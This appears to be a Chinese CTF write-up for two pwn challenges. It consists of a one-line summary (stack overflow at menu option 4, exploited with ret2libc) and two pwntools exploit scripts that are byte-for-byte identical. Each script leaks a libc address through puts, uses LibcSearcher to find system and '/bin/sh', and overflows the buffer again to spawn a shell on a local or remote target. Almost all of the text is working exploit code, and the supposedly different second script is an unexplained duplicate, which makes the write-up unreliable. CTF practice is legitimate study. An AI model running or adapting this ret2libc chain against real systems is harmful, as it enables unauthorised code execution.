思路:有低级魔法和高级魔法两部分,经分析,在选项四处存在栈溢出漏洞,两题目我都使用了ret2libc的方法,成功获得shell。
低级魔法脚本:
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
elf = ELF("pwn")
debugg=1 #0表示远程调试,1表示本地调试
sh = 0.
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
sh = process("./pwn")
else:
sh = remote(ip,port)
#lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
#catFlag = 0x08048847
offset = 22
sh.recv()
sh.sendline("4")
sh.recvuntil("You are one step short of success\n")
payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])
sh.send(payload1)#应该将send改为sendline
addr__libc_start_main=u32(sh.recv(4))#获取本程序进程中__libc_start_main的地址
obj = LibcSearcher("__libc_start_main", addr__libc_start_main)#libcsearch大法启动
baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")
addr_system=baseaddr_libc+obj.dump("system")#获得sytem地址
addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")#获得/bin/sh的地址
#print addr_system
#print addr_binsh
#addr_read=baseaddr_libc+obj.dump("read")
sh.sendline("4")
sh.recv()
#addr_bss=0x0804a040
#pppr=0x0804876d
#payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #/bin/sh\x00 共8个字节
payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)
sh.sendline(payload2)
#sh.send("/bin/sh\x00")
sh.interactive()
if __name__ == "__main__":
pwn("101.132.100.243",10011,debugg)
高级魔法脚本:
# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *
context.log_level = "debug"
elf = ELF("pwn")
debugg=1 #0表示远程调试,1表示本地调试
sh = 0.
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
sh = process("./pwn")
else:
sh = remote(ip,port)
#lib = ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
#catFlag = 0x08048847
offset = 22
sh.recv()
sh.sendline("4")
sh.recvuntil("You are one step short of success\n")
payload1=offset*'a'+p32(elf.plt['puts'])+p32(0x0804862E)+p32(elf.got['__libc_start_main'])
sh.send(payload1)#应该将send改为sendline
addr__libc_start_main=u32(sh.recv(4))#获取本程序进程中__libc_start_main的地址
obj = LibcSearcher("__libc_start_main", addr__libc_start_main)#libcsearch大法启动
baseaddr_libc=addr__libc_start_main-obj.dump("__libc_start_main")
addr_system=baseaddr_libc+obj.dump("system")#获得sytem地址
addr_binsh=baseaddr_libc+obj.dump("str_bin_sh")#获得/bin/sh的地址
#print addr_system
#print addr_binsh
#addr_read=baseaddr_libc+obj.dump("read")
sh.sendline("4")
sh.recv()
#addr_bss=0x0804a040
#pppr=0x0804876d
#payload2=offset*"a"+p32(elf.plt['read'])+p32(pppr)+p32(0)+p32(addr_bss)+p32(8)+p32(addr_system)+p32(0x11111111)+p32(addr_bss) #/bin/sh\x00 共8个字节
payload2=offset*'a'+p32(addr_system)+p32(0x11111111)+p32(addr_binsh)
sh.sendline(payload2)
#sh.send("/bin/sh\x00")
sh.interactive()
if __name__ == "__main__":
pwn("101.132.100.243",10011,debugg)